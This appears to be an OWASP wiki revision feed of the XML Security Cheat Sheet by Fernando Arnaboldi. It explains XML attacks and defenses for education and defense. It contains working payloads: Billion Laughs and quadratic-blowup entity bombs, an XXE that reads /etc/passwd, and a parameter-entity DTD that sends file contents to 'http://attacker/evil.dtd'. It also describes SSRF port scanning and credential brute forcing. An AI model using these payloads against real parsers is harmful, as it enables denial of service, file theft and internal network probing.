 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the &amp;lt;tt&amp;gt;note&amp;lt;/tt&amp;gt; element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read files from the server. This type of schema only serves as a suggestion for sending a document; to be used safely, there must be a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When XML documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker positioned on the network could sniff the connection and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using unencrypted HTTP. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an Internet Protocol (IP) address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own IP addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, example.com resolves to the IP address 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee (or by an external attacker in control of these files) could impact all users processing the schemas. Consequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).&lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; refers to another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is in turn defined as entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 (10^10) characters in memory, produced from a document of only about 400,000 characters.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these will be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; into 10^9 (1,000,000,000) copies of the string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, about 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:Envelope [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:Envelope ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:Envelope entityReference CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:Envelope entityReference=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:Body&amp;gt; &lt;br /&gt;
   &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:Body&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:Envelope&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; whose replacement text is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, and expands it within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes it retrieve a resource on the attacker's behalf, such as a local file or a remote file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % '''xxe''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM ''''http://example.com/?%file;''''''&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
When an XXE is used for port scanning, the amount and type of information returned depends on the implementation. Responses can be classified as follows, ranked from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure you can clearly see what’s going on, because you receive the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the response time when connecting to an open port will be very short (one second, for example). The difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes the differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack is difficult to accomplish over higher-latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the URI for the chosen scheme (http, ftp, etc.). For example:&lt;br /&gt;
 http://username:password@example.com:8080/&lt;br /&gt;
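&lt;br /&gt;
How such a URI splits into its components can be seen with the urllib.parse module of the Python standard library. This is only an illustrative sketch: the host and port are the placeholders from the example above, the helper name and the sample password are hypothetical, and percent-encoding the credentials is an assumption about how a client would build the URI.&lt;br /&gt;
```python
from urllib.parse import quote, unquote, urlsplit


def url_with_credentials(user: str, password: str, host: str, port: int) -> str:
    """Build an http URI that carries credentials in its userinfo component."""
    # Percent-encode reserved characters such as ":" and "@" in the credentials.
    userinfo = quote(user, safe="") + ":" + quote(password, safe="")
    return "http://" + userinfo + "@" + host + ":" + str(port) + "/"


url = url_with_credentials("username", "p@ss:word", "example.com", 8080)
parts = urlsplit(url)
print(url)
print(parts.username, unquote(parts.password), parts.hostname, parts.port)
```
Because the credentials are part of the URI itself, any parser that dereferences attacker-supplied system identifiers will submit them to the target service.&lt;br /&gt;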
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224442</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224442"/>
				<updated>2016-12-21T20:34:00Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software, divided into two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To assess the likelihood of this attack, compare the time taken to process a regular XML document with the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
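&lt;br /&gt;
A minimal Python sketch of such a comparison follows. It uses xml.etree.ElementTree from the standard library as a stand-in for the parser under test; the document size, the way the document is made malformed (dropping the final end tag), and all names are assumptions chosen for illustration.&lt;br /&gt;
```python
import time
import xml.etree.ElementTree as ET


def build_document(items: int) -> bytes:
    """Serialize a well-formed document with `items` child elements."""
    root = ET.Element("catalog")
    for i in range(items):
        ET.SubElement(root, "item").text = str(i)
    return ET.tostring(root)


def parse_seconds(document: bytes, repeat: int = 20) -> float:
    """Best-of-`repeat` wall-clock time to parse, or reject, `document`."""
    best = float("inf")
    for _ in range(repeat):
        start = time.perf_counter()
        try:
            ET.fromstring(document)
        except ET.ParseError:
            pass  # a fatal error is the expected outcome for malformed input
        best = min(best, time.perf_counter() - start)
    return best


well_formed = build_document(10_000)
# Drop the final end tag so the document is no longer well formed.
malformed = well_formed[: well_formed.rfind(b"/") - 1]

print(f"well-formed: {parse_seconds(well_formed):.6f} s")
print(f"malformed:   {parse_seconds(malformed):.6f} s")
```
The absolute numbers depend on the machine and the parser; what matters is whether the malformed variant takes noticeably longer than the well-formed one.&lt;br /&gt;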
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
